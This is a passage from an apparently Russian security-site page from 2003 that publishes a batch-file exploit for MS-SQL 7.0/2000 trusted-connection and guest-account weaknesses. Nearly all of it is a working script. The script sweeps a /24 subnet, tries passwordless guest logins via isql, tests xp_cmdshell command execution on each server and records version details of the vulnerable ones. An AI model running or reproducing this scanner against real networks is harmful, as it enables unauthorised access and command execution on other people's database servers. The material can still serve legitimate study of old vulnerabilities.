Эксплоит для MS-SQL 7.0/2000

Свойства

Дата публикации:
03.02.2003

Код

MS-SQL позволяет доступ через “доверенные подключения”("trusted connection"). Заданная по умолчанию инсталляция позволяет атакующему с "system" привилегиями  получать доступ к серверу без ввода пароля.

Ниже "batch-file" эксплоит, который демонстрирует эту уязвимость. Он требует копию программы "isql.exe" в текущем каталоге.

 
@echo off
rem ====================================================================
rem Scan networks for SQL servers that allow access via db guest account
rem ====================================================================


rem --------------------------------------------
rem Check for parameters that tell us what to do
rem --------------------------------------------
IF "%1"=="" Goto Usage
IF "%2"=="" Goto First

rem ----------------------------------
rem Clear / Set environment variables.
rem ----------------------------------
set Guest_Vulnerable=No
set Guest_cmd=No
set Vulnerable=0
set Skip=6
set PingCount=3
set SQL-Version=NA

rem ----------------------------------------
rem Test Device is Pingable and worth a pop!
rem ----------------------------------------
Echo Ping Testing %2 
ping -n 1 %2 >nul
for /F "skip=%Skip% tokens=10" %%i in ('ping -n %PingCount% %2') do IF 
%%i==%PingCount% GOTO End

rem ----------------------------------------
rem Test Device for access via Guest account
rem ----------------------------------------
echo Scanning %2 for Guest Access
isql -S%2 -Uguest -Q"quit" -l1 -t1 -E >nul
set sucks=%ERRORLEVEL%
rem Record error level : 0 = Works 
if %sucks%==0 set Guest_Vulnerable=Yes
if %sucks%==0 set Vulnerable=1

:Check_Guest_CMD
rem 
--------------------------------------------------------------------------
rem If we can't get in via Guest, don't bother testing for CMD shell 
execution.
rem 
--------------------------------------------------------------------------
If Not %Guest_Vulnerable%==Yes Goto Checks_Done

rem ------------------------------------------------------
rem Test Device for "xp_cmdshell" access via Guest account
rem ------------------------------------------------------
echo Scanning %2 for Guest CMD execution 
isql -S%2 -Uguest -Q"xp_cmdshell 'dir *.exe'" -l1 -t1 -E >nul
set sucks=%ERRORLEVEL%

rem 
--------------------------------------------------------------------------
rem Since we are here, let's get the version & patch number of the SQL 
server.
rem 
--------------------------------------------------------------------------
isql -S%2 -Uguest -Q"use master; select @@version" -l1 -t1 -E | find 
"Server" >Ver-%2.txt
for /F "tokens=6" %%i in (Ver-%2.txt) do set SQL-Version=%%i
If exist Ver-%2.txt del Ver-%2.txt
if %sucks%==0 set Guest_cmd=Yes
if %sucks%==0 set Vulnerable=1 

:Checks_Done
rem 
-----------------------------------------------------------------------
rem If the system is vulnerable then jump to the display info bit! Else 
End
rem 
-----------------------------------------------------------------------
if NOT %Vulnerable%==0 Goto GotOne
goto END

:First
rem ------------------------------------------------------
rem This is where we start! Scan the /24 IP address range.
rem ------------------------------------------------------
cls
rem ----------------------------------------
rem Scan starting from .1 and finish at .254
rem ----------------------------------------
for /L %%i in (1,1,254) do call %0 Iterate %1.%%i 
goto END

:Usage
rem ------------------------------------------
rem Basic Explanation on what this does etc...
rem ------------------------------------------
echo Usage : %0 "IP network" 
echo Where "IP network" is the first 3 octets of a subnet. 
echo e.g. 192.168.1 for network 192.168.1.0/24
goto END


:GotOne
rem ------------------------------
rem Display information discovered
rem ------------------------------
echo .
echo ------------------------------------------------------------
echo SQL Server at IP Address : %2 
echo Guest Vulnerable : %Guest_Vulnerable% 
echo Guest CMD execution : %Guest_cmd% 
echo SQL Version : %SQL-Version% 
echo ------------------------------------------------------------
echo .
echo  
 goto END
:END


или введите имя

CAPTCHA